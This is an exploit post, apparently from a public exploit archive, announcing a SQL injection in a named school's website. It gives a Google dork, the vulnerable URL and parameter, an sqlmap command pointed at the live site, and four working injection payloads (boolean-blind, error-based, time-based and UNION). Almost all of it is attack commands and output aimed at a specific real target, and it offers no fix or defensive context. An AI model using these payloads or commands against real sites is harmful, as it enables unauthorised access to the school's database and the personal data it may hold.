############################################################### # Exploit Title : Crescent Public School SQL İnjection # Descoverd By : http_v0g3l # Security Risk : Medium # Google Dork : inurl:sub-gallery.php?id= site:www.crescentpublicschool.in ############################################################### # Target https://www.crescentpublicschool.in/sub-gallery.php?id=8 ############################################################### sqlmap -u https://www.crescentpublicschool.in/sub-gallery.php?id=8 --dbs ############################################################### Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=-2756' OR 1919=1919# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=8' AND (SELECT 7674 FROM(SELECT COUNT(*),CONCAT(0x7170626271,(SELECT (ELT(7674=7674,1))),0x7178626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ONZw Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: id=8' OR (SELECT 5309 FROM (SELECT(SLEEP(5)))VToO)-- KrNF Type: UNION query Title: MySQL UNION query (NULL) - 5 columns Payload: id=8' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170626271,0x687970537546506766534e4c4c4748635067616975706f497049634f4867754a546b785042596a4b,0x7178626271),NULL# ###############################################################